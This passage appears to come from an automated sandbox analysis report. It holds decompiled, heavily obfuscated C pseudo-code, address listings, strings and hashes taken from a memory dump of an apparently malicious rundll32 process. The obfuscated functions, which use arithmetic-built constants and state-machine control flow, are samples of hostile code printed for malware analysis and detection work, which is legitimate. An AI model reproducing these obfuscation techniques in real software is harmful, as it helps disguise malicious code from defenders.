												_t525 = E00296ABA(_v1212, 0x2af820, _t621);
												_t528 =  *0x2b0724; // 0x340cf0
												E0029EF2E(_t525, _t621, _v1076, _v1116, _t528 + 0x238, _v1196, 0x104,  &_v1040, _v1172,  &_v520,  *0x2b0724, _v1236);
												E0029F935(_v1100, _t525, _v1228, _v1124);
												_t614 =  &(_t614[0xe]);
												_t608 = 0x2a9198cf;
												while(1) {
													L1:
													_t511 = 0x5c;
													_t549 = 0x84d069a;
													goto L2;
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E002931C8(_v1184, _v1052, _v1088);
						_t608 = 0x18cecc59;
						goto L17;
						L18:
						__eflags = _t608 - 0x18cecc59;
					} while (__eflags != 0);
					return _v1056;
				}
			}

0x002a12d1
0x002a12d7
0x002a12e4
0x002a12ed
0x002a12f8
0x002a1306
0x002a130b
0x002a1311
0x002a1319
0x002a1322
0x002a1327
0x002a132d
0x002a1335
0x002a1348
0x002a134b
0x002a1352
0x002a135d
0x002a1368
0x002a1373
0x002a137e
0x002a138e
0x002a1392
0x002a139a
0x002a13a2
0x002a13aa
0x002a13b2
0x002a13b7
0x002a13c4
0x002a13c7
0x002a13cb
0x002a13d3
0x002a13db
0x002a13e3
0x002a13e7
0x002a13ef
0x002a13f7
0x002a1404
0x002a140d
0x002a1411
0x002a1419
0x002a1421
0x002a1434
0x002a143b
0x002a1446
0x002a1454
0x002a1458
0x002a1460
0x002a1468
0x002a1470
0x002a147b
0x002a1486
0x002a1491
0x002a1499
0x002a14a7
0x002a14ac
0x002a14b2
0x002a14ba
0x002a14c5
0x002a14d0
0x002a14db
0x002a14ed
0x002a14f2
0x002a14fb
0x002a1506
0x002a1511
0x002a1519
0x002a1524
0x002a1531
0x002a1532
0x002a1536
0x002a1540
0x002a1544
0x002a154c
0x002a1554
0x002a155c
0x002a1564
0x002a156c
0x002a1574
0x002a157c
0x002a1584
0x002a1589
0x002a1591
0x002a159c
0x002a15a7
0x002a15b2
0x002a15bf
0x002a15c3
0x002a15cb
0x002a15d3
0x002a15db
0x002a15e6
0x002a15f1
0x002a15fc
0x002a1604
0x002a1609
0x002a1611
0x002a1619
0x002a1621
0x002a1629
0x002a162e
0x002a1636
0x002a163e
0x002a1646
0x002a164e
0x002a1658
0x002a165c
0x002a1664
0x002a1671
0x002a1675
0x002a167d
0x002a1682
0x002a168a
0x002a1692
0x002a169a
0x002a16a8
0x002a16ac
0x002a16b4
0x002a16bf
0x002a16ca
0x002a16d5
0x002a16dd
0x002a16e4
0x002a16e9
0x002a16f1
0x002a1706
0x002a1709
0x002a1710
0x002a171b
0x002a1726
0x002a173c
0x002a1743
0x002a174e
0x002a175b
0x002a175e
0x002a1762
0x002a1772
0x002a1776
0x002a177e
0x002a178b
0x002a178e
0x002a1792
0x002a179a
0x002a17a2
0x002a17aa
0x002a17b2
0x002a17ba
0x002a17c2
0x002a17cd
0x002a17d5
0x002a17e0
0x002a17e8
0x002a17f5
0x002a17f9
0x002a1801
0x002a1809
0x002a1811
0x002a181e
0x002a1822
0x002a182a
0x002a1835
0x002a183d
0x002a1848
0x002a1850
0x002a185c
0x002a1861
0x002a1867
0x002a186f
0x002a1881
0x002a1886
0x002a1896
0x002a1899
0x002a18a0
0x002a18ab
0x002a18b3
0x002a18c5
0x002a18ca
0x002a18d1
0x002a18d5
0x002a18dd
0x002a18e5
0x002a18ed
0x002a18f2
0x002a18fa
0x002a1905
0x002a1910
0x002a191b
0x002a1931
0x002a193a
0x002a1945
0x002a1952
0x002a1955
0x002a1961
0x002a1965
0x002a196d
0x002a1975
0x002a197e
0x002a1981
0x002a1985
0x002a198d
0x002a1995
0x002a19a0
0x002a19ab
0x002a19b6
0x002a19c1
0x002a19c9
0x002a19d4
0x002a19dc
0x002a19e1
0x002a19e9
0x002a19f1
0x002a19f1
0x002a19f3
0x002a19f4
0x002a19f9
0x00000000
0x002a19f9
0x002a1a07
0x002a1c15
0x002a1c1c
0x002a1c1f
0x002a1c21
0x002a1c29
0x00000000
0x002a1a0d
0x002a1a13
0x002a1b80
0x002a1ba5
0x002a1baa
0x002a1bad
0x002a19f1
0x002a19f1
0x002a19f3
0x002a19f4
0x00000000
0x002a19f4
0x002a1a19
0x002a1a1f
0x002a1b63
0x002a1b6e
0x002a1b6e
0x002a1b71
0x00000000
0x00000000
0x002a1b6b
0x002a1b6b
0x002a1b6b
0x002a1b73
0x002a1b76
0x00000000
0x002a1a25
0x002a1a2b
0x002a1acc
0x002a1ad5
0x002a1add
0x002a1ae3
0x002a1b3a
0x002a1b53
0x002a1b56
0x002a1b5b
0x002a1c57
0x002a1c59
0x002a1c5e
0x002a1a31
0x002a1a31
0x002a1a37
0x002a1a3d
0x002a1a46
0x002a1a51
0x002a1a81
0x002a1aa1
0x002a1aba
0x002a1abf
0x002a1ac2
0x002a19f1
0x002a19f1
0x002a19f3
0x002a19f4
0x00000000
0x002a19f4
0x002a19f1
0x002a1a37
0x002a1a2b
0x002a1a1f
0x002a1a13
0x00000000
0x002a1a07
0x002a1c4e
0x002a1c55
0x00000000
0x002a1c5f
0x002a1c5f
0x002a1c5f
0x002a1c78
0x002a1c78

Strings

*, xrefs: 002A16F1
#u, xrefs: 002A165C
W:, xrefs: 002A1675
9, xrefs: 002A16BF
B?, xrefs: 002A16E9
:N, xrefs: 002A183D
M., xrefs: 002A19A0
v|, xrefs: 002A14FB
}?, xrefs: 002A12ED
2-, xrefs: 002A18DD
X2, xrefs: 002A137E
], xrefs: 002A17A2
4s, xrefs: 002A1506
), xrefs: 002A174E
DiK, xrefs: 002A1468
p, xrefs: 002A1621
B, xrefs: 002A177E
]t, xrefs: 002A168A
R, xrefs: 002A1848
.Y^, xrefs: 002A1609
`, xrefs: 002A19B6

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #u$)$*$.Y^$2-$4s$:N$B?$M.$W:$X2$]t$]$`$v|$}?$9$B$DiK$R$p
API String ID: 0-506989431
Opcode ID: 8afc9bda05937da2bd727cd31649436705a9b9b3e4ca769bfa356d0a66e1a2c8
Instruction ID: 7caf2604bd2754176354873cc80b85dae97b0e3fc5d7a0fca4cfd2fe51318847
Opcode Fuzzy Hash: 8afc9bda05937da2bd727cd31649436705a9b9b3e4ca769bfa356d0a66e1a2c8
Instruction Fuzzy Hash: AE32127150C381DFE368CF25C98AA5BBBE2FBC5354F10891DE299862A0D7B58958CF03

Uniqueness

Uniqueness Score: -1.00%

Function 002A68CB, Relevance: 23.0, Strings: 18, Instructions: 453
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E002A68CB(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				void* _t434;
				intOrPtr _t469;
				intOrPtr _t471;
				signed int _t475;
				signed int _t477;
				intOrPtr _t484;
				signed int _t489;
				intOrPtr _t492;
				intOrPtr _t495;
				intOrPtr _t496;
				void* _t498;
				intOrPtr _t499;
				intOrPtr _t501;
				signed int _t502;
				intOrPtr _t505;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				intOrPtr _t519;
				intOrPtr _t545;
				void* _t551;
				void* _t553;
				signed int* _t568;
				void* _t570;

				_t507 = _a4;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t434);
				_v16 = 0x79cd75;
				_t568 =  &(( &_v212)[4]);
				asm("stosd");
				_t553 = 0x360116c5;
				asm("stosd");
				_t509 = 0x71;
				asm("stosd");
				_v100 = 0x2227;
				_t551 = 0;
				_v100 = _v100 | 0x3cd009d5;
				_v100 = _v100 + 0xffffa411;
				_v100 = _v100 ^ 0x3ccfb606;
				_v108 = 0x2463;
				_v108 = _v108 / _t509;
				_t510 = 0x39;
				_v108 = _v108 * 0x4c;
				_v108 = _v108 ^ 0x0000985c;
				_v188 = 0x6f70;
				_v188 = _v188 + 0xffff2312;
				_v188 = _v188 | 0x2a7d245c;
				_v188 = _v188 << 7;
				_v188 = _v188 ^ 0xffdbef00;
				_v204 = 0x75b4;
				_v204 = _v204 / _t510;
				_v204 = _v204 + 0x3411;
				_v204 = _v204 + 0xffffe4f1;
				_v204 = _v204 ^ 0x00001b13;
				_v176 = 0xf2cc;
				_v176 = _v176 ^ 0x0c8b3ad5;
				_t511 = 0x41;
				_v176 = _v176 * 0x68;
				_v176 = _v176 << 0xb;
				_v176 = _v176 ^ 0x4a514040;
				_v64 = 0x144e;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0xf000a270;
				_v52 = 0x1063;
				_v52 = _v52 | 0x5daca785;
				_v52 = _v52 ^ 0x5dac8fc7;
				_v200 = 0x5825;
				_v200 = _v200 * 0x49;
				_v200 = _v200 / _t511;
				_v200 = _v200 ^ 0x647fb738;
				_v200 = _v200 ^ 0x647ffcd8;
				_v208 = 0x7c7f;
				_v208 = _v208 >> 9;
				_v208 = _v208 ^ 0x0ba3915a;
				_v208 = _v208 + 0xffff9910;
				_v208 = _v208 ^ 0x0ba307aa;
				_v128 = 0x48fb;
				_v128 = _v128 + 0xffffea65;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x00003a72;
				_v152 = 0x7e92;
				_v152 = _v152 | 0xdddfeef3;
				_v152 = _v152 >> 0xb;
				_v152 = _v152 ^ 0x001bef09;
				_v88 = 0xfbe;
				_v88 = _v88 ^ 0x24589b22;
				_v88 = _v88 << 5;
				_v88 = _v88 ^ 0x8b12b1de;
				_v48 = 0x1715;
				_v48 = _v48 + 0xffff7b06;
				_v48 = _v48 ^ 0xffff8c51;
				_v168 = 0xc939;
				_v168 = _v168 | 0xb425a04d;
				_v168 = _v168 + 0xffff5eb6;
				_t512 = 0x3a;
				_v168 = _v168 / _t512;
				_v168 = _v168 ^ 0x031b5098;
				_v104 = 0xa8da;
				_v104 = _v104 >> 3;
				_v104 = _v104 + 0xae7c;
				_v104 = _v104 ^ 0x0000b827;
				_v56 = 0x6eab;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x000dd63d;
				_v96 = 0x6d10;
				_v96 = _v96 << 2;
				_v96 = _v96 + 0xffffe478;
				_v96 = _v96 ^ 0x0001f912;
				_v160 = 0x9bd9;
				_v160 = _v160 ^ 0x52db1b0f;
				_v160 = _v160 ^ 0xc9aff98f;
				_v160 = _v160 << 8;
				_v160 = _v160 ^ 0x747945a8;
				_v40 = 0xc6b7;
				_v40 = _v40 | 0x500b25f0;
				_v40 = _v40 ^ 0x500b88bb;
				_v212 = 0x6b3c;
				_v212 = _v212 | 0xe1842ac5;
				_t513 = 9;
				_v212 = _v212 / _t513;
				_v212 = _v212 + 0xdac0;
				_v212 = _v212 ^ 0x190fe0cc;
				_v156 = 0x2b4e;
				_v156 = _v156 | 0xa342ae93;
				_t514 = 5;
				_v156 = _v156 / _t514;
				_v156 = _v156 ^ 0x765355c0;
				_v156 = _v156 ^ 0x56f5be8f;
				_v136 = 0xff44;
				_v136 = _v136 | 0xdb29a193;
				_t515 = 0x1f;
				_v136 = _v136 * 0x56;
				_v136 = _v136 ^ 0xa01be086;
				_v148 = 0xee3f;
				_v148 = _v148 + 0x501a;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x0027c222;
				_v124 = 0xf285;
				_v124 = _v124 << 0x10;
				_v124 = _v124 | 0x8bf3a027;
				_v124 = _v124 ^ 0xfbf79f04;
				_v184 = 0x89f9;
				_v184 = _v184 ^ 0x007f2033;
				_v184 = _v184 >> 0x10;
				_v184 = _v184 / _t515;
				_v184 = _v184 ^ 0x00002e50;
				_v80 = 0x8c1d;
				_v80 = _v80 | 0xaf410438;
				_v80 = _v80 ^ 0xaf41f117;
				_v192 = 0x7abf;
				_v192 = _v192 >> 0xd;
				_t516 = 0x42;
				_v192 = _v192 / _t516;
				_v192 = _v192 << 0x10;
				_v192 = _v192 ^ 0x00005501;
				_v28 = 0xc71b;
				_v28 = _v28 + 0xbb71;
				_v28 = _v28 ^ 0x0001e5fc;
				_v120 = 0xa6c1;
				_t517 = 0x2a;
				_v120 = _v120 * 0x61;
				_v120 = _v120 + 0x1560;
				_v120 = _v120 ^ 0x003f3b27;
				_v72 = 0xd93;
				_v72 = _v72 << 1;
				_v72 = _v72 ^ 0x00004125;
				_v112 = 0xa280;
				_v112 = _v112 << 0xb;
				_v112 = _v112 + 0x533;
				_v112 = _v112 ^ 0x051418ac;
				_v180 = 0x1180;
				_v180 = _v180 << 1;
				_v180 = _v180 << 3;
				_v180 = _v180 + 0xa356;
				_v180 = _v180 ^ 0x0001b606;
				_v144 = 0xdc1b;
				_v144 = _v144 * 0x2b;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x00004a7a;
				_v84 = 0xc459;
				_v84 = _v84 / _t517;
				_v84 = _v84 ^ 0x00005cf8;
				_v164 = 0xe226;
				_v164 = _v164 + 0xffff9be5;
				_t518 = 0x68;
				_v164 = _v164 / _t518;
				_v164 = _v164 + 0xe0b;
				_v164 = _v164 ^ 0x00002615;
				_v140 = 0x19eb;
				_v140 = _v140 << 0xa;
				_v140 = _v140 ^ 0x236f8deb;
				_v140 = _v140 ^ 0x23082bc1;
				_v76 = 0xcdb3;
				_v76 = _v76 + 0xa380;
				_v76 = _v76 ^ 0x00016ecf;
				_v60 = 0xd52d;
				_v60 = _v60 << 6;
				_v60 = _v60 ^ 0x003563e5;
				_v32 = 0xe8c5;
				_v32 = _v32 + 0xffff36e5;
				_v32 = _v32 ^ 0x0000021d;
				_v68 = 0x8805;
				_v68 = _v68 ^ 0x5705875c;
				_v68 = _v68 ^ 0x57056974;
				_v44 = 0x98f4;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x00004bcc;
				_v132 = 0x7d06;
				_v132 = _v132 + 0xdbf8;
				_v132 = _v132 << 0x10;
				_v132 = _v132 ^ 0x58fe476c;
				_v172 = 0x3e2f;
				_v172 = _v172 << 2;
				_v172 = _v172 | 0xb4cc5e5f;
				_v172 = _v172 ^ 0xe6f3cec2;
				_v172 = _v172 ^ 0x523f30f0;
				_v196 = 0xda5f;
				_v196 = _v196 * 0x3d;
				_v196 = _v196 | 0xad149301;
				_v196 = _v196 + 0xe581;
				_v196 = _v196 ^ 0xad359d57;
				_v116 = 0x736a;
				_v116 = _v116 * 0x46;
				_v116 = _v116 + 0xffff86d6;
				_v116 = _v116 ^ 0x001e15d2;
				_v92 = 0x105b;
				_v92 = _v92 ^ 0xde8a2ffb;
				_v92 = _v92 * 0x72;
				_v92 = _v92 ^ 0x19905553;
				_v36 = 0x9dc4;
				_v36 = _v36 + 0xffff12ea;
				_v36 = _v36 ^ 0xffffb0af;
				goto L1;
				do {
					while(1) {
						L1:
						_t570 = _t553 - 0x287d7a71;
						if(_t570 > 0) {
							break;
						}
						if(_t570 == 0) {
							_t518 = _v212;
							_t489 = E002AA69B(_t518, _v156,  &_v20,  *((intOrPtr*)(_t507 + 4)), _v136,  *_t507, _v188,  &_v24, _t518, _v148, _v36 | _v116, _v92, _v124);
							_t568 =  &(_t568[0xb]);
							asm("sbb esi, esi");
							_t553 = ( ~_t489 & 0x06f5c840) + 0x2d44d745;
							continue;
						} else {
							if(_t553 == 0xc79a0e7) {
								_t492 =  *0x2af9d0; // 0x0
								E00292696( *((intOrPtr*)(_t492 + 4)));
								_pop(_t518);
								_t553 = 0x26333af5;
								continue;
							} else {
								if(_t553 == 0xf2080a0) {
									_t545 =  *0x2af9d0; // 0x0
									E0029EF80(_v152, _t545, _v88);
								} else {
									if(_t553 == 0x124f174f) {
										_t495 =  *0x2af9d0; // 0x0
										_push(_t518);
										_t496 =  *0x2af9d0; // 0x0
										_t498 = E00298E6E(_v60, _v32, _v108, _v68, _t496 + 8, _v44, _v132,  *((intOrPtr*)(_t495 + 0x18)));
										_t568 =  &(_t568[8]);
										if(_t498 != 0) {
											_t551 = 1;
										} else {
											_t553 = 0xc79a0e7;
											continue;
										}
									} else {
										if(_t553 == 0x177348ac) {
											_t499 =  *0x2af9d0; // 0x0
											_t501 =  *0x2af9d0; // 0x0
											_t518 = _v100;
											_t502 = E0029DC79(_t518, _v84, _v164,  *((intOrPtr*)(_t501 + 0x18)), _v204, _v140, _t499 + 4, _v76);
											_t568 =  &(_t568[6]);
											asm("sbb esi, esi");
											_t553 = ( ~_t502 & 0xec1bdc5a) + 0x26333af5;
											continue;
										} else {
											if(_t553 != 0x26333af5) {
												goto L23;
											} else {
												_t505 =  *0x2af9d0; // 0x0
												E00292696( *((intOrPtr*)(_t505 + 0x30)));
												_pop(_t518);
												_t553 = 0x2d44d745;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						return _t551;
					}
					if(_t553 == 0x2d44d745) {
						_t469 =  *0x2af9d0; // 0x0
						_push(_t518);
						E002937C9(_t518,  *((intOrPtr*)(_t469 + 0x18)));
						_t568 =  &(_t568[3]);
						_t553 = 0xf2080a0;
						goto L23;
					} else {
						if(_t553 == 0x3303c7f7) {
							_t471 =  *0x2af9d0; // 0x0
							_t475 = E002A8243(_t518, _v48, _t518, _v168, _t518, _v104, _v56, _v64 | _v176, _t471 + 0x18);
							_t568 =  &(_t568[7]);
							asm("sbb esi, esi");
							_t553 = ( ~_t475 & 0x195cf9d1) + 0xf2080a0;
							goto L1;
						} else {
							if(_t553 == 0x343a9f85) {
								_t519 =  *0x2af9d0; // 0x0
								_t414 = _t519 + 0x30; // 0x30
								_t477 = E002967AC(_v20, _t519, _v184,  *((intOrPtr*)(_t519 + 0x18)), _v24, _t414, _v80, _v192, _v28, _v120);
								_t518 = _v24;
								asm("sbb esi, esi");
								_t553 = ( ~_t477 & 0xea2e7167) + 0x2d44d745;
								E00292231(_t518, _v72, _v112);
								_t568 =  &(_t568[0xa]);
								goto L23;
							} else {
								if(_t553 != 0x360116c5) {
									goto L23;
								} else {
									_push(_t518);
									_push(_t518);
									_t484 = E002A9E2B(0x34);
									_t568 =  &(_t568[3]);
									 *0x2af9d0 = _t484;
									if(_t484 != 0) {
										_t553 = 0x3303c7f7;
										goto L1;
									}
								}
							}
						}
					}
					goto L27;
					L23:
				} while (_t553 != 0x23bcc5dc);
				goto L27;
			}

0x002a68d2
0x002a68dc
0x002a68e3
0x002a68e4
0x002a68e5
0x002a68e6
0x002a68eb
0x002a68ff
0x002a6902
0x002a6905
0x002a690c
0x002a690d
0x002a6910
0x002a6911
0x002a691c
0x002a691e
0x002a6929
0x002a6934
0x002a693f
0x002a694f
0x002a6958
0x002a695b
0x002a695f
0x002a6967
0x002a696f
0x002a6977
0x002a697f
0x002a6984
0x002a698c
0x002a699c
0x002a69a0
0x002a69a8
0x002a69b0
0x002a69b8
0x002a69c0
0x002a69cd
0x002a69ce
0x002a69d2
0x002a69d7
0x002a69df
0x002a69ea
0x002a69f2
0x002a69fd
0x002a6a08
0x002a6a13
0x002a6a1e
0x002a6a2b
0x002a6a35
0x002a6a39
0x002a6a41
0x002a6a49
0x002a6a51
0x002a6a56
0x002a6a5e
0x002a6a66
0x002a6a6e
0x002a6a76
0x002a6a7e
0x002a6a83
0x002a6a8b
0x002a6a93
0x002a6a9d
0x002a6aa2
0x002a6aaa
0x002a6ab5
0x002a6ac0
0x002a6ac8
0x002a6ad3
0x002a6ade
0x002a6ae9
0x002a6af4
0x002a6afc
0x002a6b04
0x002a6b12
0x002a6b17
0x002a6b1d
0x002a6b25
0x002a6b30
0x002a6b38
0x002a6b43
0x002a6b4e
0x002a6b59
0x002a6b61
0x002a6b6c
0x002a6b77
0x002a6b7f
0x002a6b8a
0x002a6b95
0x002a6b9d
0x002a6ba5
0x002a6bad
0x002a6bb2
0x002a6bba
0x002a6bc5
0x002a6bd0
0x002a6bdb
0x002a6be3
0x002a6bef
0x002a6bf4
0x002a6bfa
0x002a6c02
0x002a6c0a
0x002a6c12
0x002a6c1e
0x002a6c23
0x002a6c29
0x002a6c31
0x002a6c39
0x002a6c41
0x002a6c4e
0x002a6c4f
0x002a6c53
0x002a6c5b
0x002a6c63
0x002a6c6b
0x002a6c70
0x002a6c78
0x002a6c80
0x002a6c85
0x002a6c8d
0x002a6c95
0x002a6c9d
0x002a6ca5
0x002a6cb0
0x002a6cb4
0x002a6cbe
0x002a6cc9
0x002a6cd4
0x002a6cdf
0x002a6ce7
0x002a6cf2
0x002a6cf7
0x002a6cfd
0x002a6d02
0x002a6d0a
0x002a6d15
0x002a6d20
0x002a6d2b
0x002a6d38
0x002a6d3b
0x002a6d3f
0x002a6d47
0x002a6d4f
0x002a6d5a
0x002a6d61
0x002a6d6c
0x002a6d74
0x002a6d79
0x002a6d81
0x002a6d89
0x002a6d91
0x002a6d95
0x002a6d9a
0x002a6da2
0x002a6daa
0x002a6db7
0x002a6dbb
0x002a6dc0
0x002a6dc8
0x002a6dde
0x002a6de5
0x002a6df0
0x002a6df8
0x002a6e04
0x002a6e07
0x002a6e0b
0x002a6e13
0x002a6e1b
0x002a6e23
0x002a6e28
0x002a6e30
0x002a6e38
0x002a6e43
0x002a6e4e
0x002a6e59
0x002a6e64
0x002a6e6c
0x002a6e77
0x002a6e82
0x002a6e8d
0x002a6e98
0x002a6ea3
0x002a6eae
0x002a6eb9
0x002a6ec4
0x002a6ecc
0x002a6ed7
0x002a6edf
0x002a6ee7
0x002a6eec
0x002a6ef4
0x002a6efc
0x002a6f06
0x002a6f0e
0x002a6f16
0x002a6f1e
0x002a6f2b
0x002a6f2f
0x002a6f37
0x002a6f3f
0x002a6f47
0x002a6f54
0x002a6f58
0x002a6f60
0x002a6f68
0x002a6f73
0x002a6f86
0x002a6f8d
0x002a6f98
0x002a6fa3
0x002a6fae
0x002a6fae
0x002a6fb9
0x002a6fb9
0x002a6fb9
0x002a6fb9
0x002a6fbf
0x00000000
0x00000000
0x002a6fc5
0x002a7119
0x002a711e
0x002a7123
0x002a712a
0x002a7132
0x00000000
0x002a6fcb
0x002a6fd1
0x002a70c5
0x002a70cd
0x002a70d2
0x002a70d3
0x00000000
0x002a6fd7
0x002a6fdd
0x002a7291
0x002a729b
0x002a6fe3
0x002a6fe9
0x002a706a
0x002a706f
0x002a707e
0x002a70a3
0x002a70a8
0x002a70ad
0x002a7287
0x002a70b3
0x002a70b3
0x00000000
0x002a70b3
0x002a6feb
0x002a6ff1
0x002a7020
0x002a7031
0x002a7044
0x002a704b
0x002a7050
0x002a7057
0x002a705f
0x00000000
0x002a6ff3
0x002a6ff9
0x00000000
0x002a6fff
0x002a7007
0x002a700f
0x002a7014
0x002a7015
0x00000000
0x002a7015
0x002a6ff9
0x002a6ff1
0x002a6fe9
0x002a6fdd
0x002a6fd1
0x002a72a1
0x002a72ad
0x002a72ad
0x002a713b
0x002a7260
0x002a7265
0x002a726a
0x002a726f
0x002a7272
0x00000000
0x002a7141
0x002a7147
0x002a71ff
0x002a722f
0x002a7234
0x002a723b
0x002a7243
0x00000000
0x002a714d
0x002a7153
0x002a71ad
0x002a71b3
0x002a71cd
0x002a71e2
0x002a71eb
0x002a71f3
0x002a71f5
0x002a71fa
0x00000000
0x002a7155
0x002a715b
0x00000000
0x002a7161
0x002a7174
0x002a7175
0x002a7178
0x002a717d
0x002a7180
0x002a7187
0x002a718d
0x00000000
0x002a718d
0x002a7187
0x002a715b
0x002a7153
0x002a7147
0x00000000
0x002a7277
0x002a7277
0x00000000

Strings

';?, xrefs: 002A6D47
c5, xrefs: 002A6E6C
%X, xrefs: 002A6A1E
js, xrefs: 002A6F47
?, xrefs: 002A6C5B
qz}(, xrefs: 002A6FB9
'", xrefs: 002A6911
c$, xrefs: 002A693F
zJ, xrefs: 002A6DC0
N+, xrefs: 002A6C0A
/>, xrefs: 002A6EF4
%A, xrefs: 002A6D61
\$}*, xrefs: 002A6977
&, xrefs: 002A6DF0
P., xrefs: 002A6CB4
r:, xrefs: 002A6A83
<k, xrefs: 002A6BDB
@@QJ, xrefs: 002A69D7

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %A$%X$&$'"$';?$/>$<k$?$@@QJ$N+$P.$\$}*$c$$js$qz}($r:$zJ$c5
API String ID: 0-964183182
Opcode ID: e1dd2c7e0ec9537a853707c0c6b64f5b8391d5e6f364701adcbe0326f078915f
Instruction ID: 836ea61b756c03274de2ef3f031ee388d81a5814b9821bc2ee2497b56f4820d8
Opcode Fuzzy Hash: e1dd2c7e0ec9537a853707c0c6b64f5b8391d5e6f364701adcbe0326f078915f
Instruction Fuzzy Hash: 6A32447250C381DFE368CF64D98AA8BBBE1BBC5304F10891DE5D996260DBB58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00294D5F, Relevance: 19.2, Strings: 15, Instructions: 412
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E00294D5F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr* _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				unsigned int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				signed int _v1220;
				signed int _v1224;
				signed int _v1228;
				signed int _v1232;
				void* _t467;
				intOrPtr* _t470;
				intOrPtr* _t472;
				void* _t476;
				intOrPtr _t479;
				signed int _t484;
				void* _t486;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				intOrPtr _t530;
				intOrPtr* _t531;
				intOrPtr* _t532;
				signed int* _t536;
				void* _t540;

				_t536 =  &_v1232;
				_v1200 = 0x152a;
				_v1200 = _v1200 >> 8;
				_t486 = 0x66715dc;
				_v1200 = _v1200 + 0xcebc;
				_v1200 = _v1200 << 4;
				_v1200 = _v1200 ^ 0x000ced39;
				_v1044 = 0xdddd;
				_v1044 = _v1044 * 0x65;
				_t532 = 0;
				_v1044 = _v1044 ^ 0x00579774;
				_v1128 = 0x2fcf;
				_t523 = 0x25;
				_v1128 = _v1128 / _t523;
				_v1128 = _v1128 + 0xffff498b;
				_v1128 = _v1128 ^ 0xffff5057;
				_v1176 = 0xd900;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 | 0x7daa82a3;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0xba0af7a4;
				_v1072 = 0xdf36;
				_v1072 = _v1072 ^ 0x5cef088e;
				_v1072 = _v1072 ^ 0x5cefbaae;
				_v1152 = 0x21d9;
				_t484 = 0x72;
				_v1052 = 0;
				_v1152 = _v1152 * 0x21;
				_v1152 = _v1152 | 0x13dcd65f;
				_v1152 = _v1152 ^ 0x13dcc02d;
				_v1088 = 0x136f;
				_v1088 = _v1088 | 0x4b6a172f;
				_v1088 = _v1088 ^ 0x4b6a6136;
				_v1184 = 0xfe59;
				_v1184 = _v1184 << 0xf;
				_v1184 = _v1184 >> 2;
				_v1184 = _v1184 ^ 0x649757e4;
				_v1184 = _v1184 ^ 0x7b5c34f4;
				_v1216 = 0xd033;
				_v1216 = _v1216 + 0xffff521f;
				_v1216 = _v1216 | 0xe290528f;
				_v1216 = _v1216 >> 4;
				_v1216 = _v1216 ^ 0x0e292e59;
				_v1120 = 0xff41;
				_v1120 = _v1120 >> 8;
				_v1120 = _v1120 + 0xdd05;
				_v1120 = _v1120 ^ 0x0000c1e1;
				_v1144 = 0x65dc;
				_v1144 = _v1144 * 0x13;
				_v1144 = _v1144 / _t484;
				_v1144 = _v1144 ^ 0x00004c5d;
				_v1048 = 0x4fbb;
				_v1048 = _v1048 >> 0xf;
